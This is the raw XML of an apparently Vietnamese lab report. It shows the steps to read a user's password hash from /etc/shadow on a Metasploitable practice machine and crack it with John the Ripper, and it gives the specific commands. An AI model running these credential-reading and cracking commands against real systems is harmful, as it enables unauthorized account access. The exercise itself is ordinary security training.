    <w:p w14:paraId="21C371BD" w14:textId="1AF9C709" w:rsidR="00C570D8" w:rsidRPr="005D53A4" w:rsidRDefault="00C570D8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48F887D5" wp14:editId="2FFD141F">
            <wp:extent cx="5731510" cy="21609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7753" w14:textId="18B6FCFD" w:rsidR="00C570D8" w:rsidRPr="005D53A4" w:rsidRDefault="00C570D8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Lấy tên người dùng và mật khẩu đã tạo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ở máy Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E77043" w14:textId="77ADDFB9" w:rsidR="002D35C3" w:rsidRPr="005D53A4" w:rsidRDefault="009B311A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Gõ lệnh: </w:t>
      </w:r>
      <w:r w:rsidR="002D35C3" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/shadow | grep </w:t>
      </w:r>
      <w:r w:rsidR="002D35C3" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kienht098</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C715774" w14:textId="58FD5129" w:rsidR="00AC7E46" w:rsidRPr="005D53A4" w:rsidRDefault="00AC7E46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50A8FF7B" wp14:editId="66ABCA6A">
            <wp:extent cx="5731510" cy="8623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C72E" w14:textId="77777777" w:rsidR="00A02FDA" w:rsidRPr="005D53A4" w:rsidRDefault="003D17FF" w:rsidP="00C570D8">
      <w:pPr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Chọn và sao chép cả dòng tên người dùng và mật khẩu băm vào clipboard </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091F6D89" w14:textId="78E6C9D7" w:rsidR="003D17FF" w:rsidRPr="005D53A4" w:rsidRDefault="003D17FF" w:rsidP="00C570D8">
      <w:pPr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- Mở một cửa sổ Terminal mới, chạy lệnh: nano password</w:t>
      </w:r>
      <w:r w:rsidR="00A02FDA" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sau đó paste thông tin tên người dùng và mật khẩu băm từ clipboard vào file password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DA46AC" w14:textId="2F2BB403" w:rsidR="00E65DFA" w:rsidRPr="005D53A4" w:rsidRDefault="00E65DFA" w:rsidP="00C570D8">
      <w:pPr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Gõ Ctrl-x để lưu vào file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AB259A" w14:textId="3FD5C6B0" w:rsidR="003B59C8" w:rsidRPr="005D53A4" w:rsidRDefault="003B59C8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662B684B" wp14:editId="64A521DE">
            <wp:extent cx="5731510" cy="1145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38EE" w14:textId="7789FE58" w:rsidR="002003B9" w:rsidRPr="005D53A4" w:rsidRDefault="00547783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6033C95B" wp14:editId="786A47BE">
            <wp:extent cx="5731510" cy="1242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66F7" w14:textId="302537C9" w:rsidR="00FD5F22" w:rsidRPr="005D53A4" w:rsidRDefault="00FD5F22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</w:rPr>
        <w:t>Crack để lấy mật khẩu</w:t>
      </w:r>
      <w:r w:rsidR="003A5601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ta</w:t>
      </w:r>
      <w:r w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sử dụng chương trình john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433EA516" w14:textId="3BD1563D" w:rsidR="002003B9" w:rsidRPr="005D53A4" w:rsidRDefault="002003B9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Gõ lệnh: john password --wordlist="password" để phát hiện mã hàm băm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772C0BC6" w14:textId="03739754" w:rsidR="00D53FBB" w:rsidRPr="005D53A4" w:rsidRDefault="00D53FBB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1476EF48" wp14:editId="20861378">
            <wp:extent cx="5731510" cy="12928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DAC9" w14:textId="6FCCA3B6" w:rsidR="002003B9" w:rsidRPr="005D53A4" w:rsidRDefault="002003B9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Gõ lệnh: john --format=md5crypt-long để crack mật khẩu   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B175D4" w14:textId="1C23EEE1" w:rsidR="00D53FBB" w:rsidRPr="005D53A4" w:rsidRDefault="00D53FBB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7933DF71" wp14:editId="546296B9">
            <wp:extent cx="5731510" cy="1549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E8DC" w14:textId="435C7075" w:rsidR="00CD5BB9" w:rsidRPr="005D53A4" w:rsidRDefault="009C5647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Gõ lệnh: </w:t>
      </w:r>
      <w:r w:rsidR="00CD5BB9" w:rsidRPr="005D53A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>john --show password</w:t>
      </w:r>
      <w:r w:rsidR="00262637" w:rsidRPr="005D53A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4C530A66" w14:textId="6401721E" w:rsidR="00262637" w:rsidRPr="005D53A4" w:rsidRDefault="00262637" w:rsidP="00C570D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161F5E3A" wp14:editId="2B1DDAF0">
            <wp:extent cx="5731510" cy="5918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04D" w14:textId="4C0DCBD9" w:rsidR="00582A74" w:rsidRPr="005D53A4" w:rsidRDefault="00582A74" w:rsidP="00582A7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Đã crack mật khẩu thành công</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00582A74" w:rsidRPr="005D53A4" w:rsidSect="00986334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C4AC6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E9E6C3F8"/>
    <w:lvl w:ilvl="0" w:tplc="F3BC3D7A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4742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87B"/>
    <w:rsid w:val="00040A10"/>
    <w:rsid w:val="000A35C8"/>
    <w:rsid w:val="000E5692"/>
    <w:rsid w:val="0015721E"/>
    <w:rsid w:val="00164D26"/>
    <w:rsid w:val="001C75C5"/>
    <w:rsid w:val="001D1FD2"/>
    <w:rsid w:val="001D2B8E"/>
    <w:rsid w:val="002003B9"/>
    <w:rsid w:val="002048D7"/>
    <w:rsid w:val="00243AE1"/>
    <w:rsid w:val="0025188F"/>
    <w:rsid w:val="00262637"/>
    <w:rsid w:val="0027208C"/>
    <w:rsid w:val="0027553A"/>
    <w:rsid w:val="00296362"/>
    <w:rsid w:val="002D35C3"/>
    <w:rsid w:val="002F2FC5"/>
    <w:rsid w:val="00335ECD"/>
    <w:rsid w:val="00363750"/>
    <w:rsid w:val="003A5601"/>
    <w:rsid w:val="003A672E"/>
    <w:rsid w:val="003B59C8"/>
    <w:rsid w:val="003C3C34"/>
    <w:rsid w:val="003D17FF"/>
    <w:rsid w:val="003D6BD0"/>
    <w:rsid w:val="00417F95"/>
    <w:rsid w:val="00423E46"/>
    <w:rsid w:val="00443D8C"/>
    <w:rsid w:val="00453F16"/>
    <w:rsid w:val="0051187B"/>
    <w:rsid w:val="00527023"/>
    <w:rsid w:val="00547783"/>
    <w:rsid w:val="00565F2F"/>
    <w:rsid w:val="00582A74"/>
    <w:rsid w:val="005D53A4"/>
    <w:rsid w:val="00666C04"/>
    <w:rsid w:val="00672963"/>
    <w:rsid w:val="00676A93"/>
    <w:rsid w:val="0069514B"/>
    <w:rsid w:val="006B40DF"/>
    <w:rsid w:val="00724F3E"/>
    <w:rsid w:val="00765E3F"/>
    <w:rsid w:val="00790D7C"/>
    <w:rsid w:val="007F0551"/>
    <w:rsid w:val="00835F4C"/>
    <w:rsid w:val="00863593"/>
    <w:rsid w:val="00882A46"/>
    <w:rsid w:val="00882E71"/>
    <w:rsid w:val="00884627"/>
    <w:rsid w:val="008A4745"/>
    <w:rsid w:val="008C76E1"/>
    <w:rsid w:val="00920302"/>
    <w:rsid w:val="00950098"/>
    <w:rsid w:val="00986334"/>
    <w:rsid w:val="009B311A"/>
    <w:rsid w:val="009C5647"/>
    <w:rsid w:val="00A02FDA"/>
    <w:rsid w:val="00A03D80"/>
    <w:rsid w:val="00A40A48"/>
    <w:rsid w:val="00A52326"/>
    <w:rsid w:val="00AC7E46"/>
    <w:rsid w:val="00AF5ACD"/>
    <w:rsid w:val="00B04D94"/>
    <w:rsid w:val="00B1075F"/>
    <w:rsid w:val="00B27302"/>
    <w:rsid w:val="00B6274D"/>
    <w:rsid w:val="00C20CF3"/>
    <w:rsid w:val="00C570D8"/>
    <w:rsid w:val="00CC22AE"/>
    <w:rsid w:val="00CD5BB9"/>
    <w:rsid w:val="00CE3162"/>
    <w:rsid w:val="00D3762F"/>
    <w:rsid w:val="00D37A90"/>
    <w:rsid w:val="00D53FBB"/>
    <w:rsid w:val="00D66EB4"/>
    <w:rsid w:val="00E35BAB"/>
    <w:rsid w:val="00E60F52"/>
    <w:rsid w:val="00E65DFA"/>
    <w:rsid w:val="00ED6CEB"/>
    <w:rsid w:val="00FD5F22"/>
    <w:rsid w:val="00FE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DCA52D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AE409461-A977-4EE4-834E-FC87C72B5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75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5</cp:revision>
  <cp:lastPrinted>2023-03-14T03:34:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-14T03:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-16T02:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>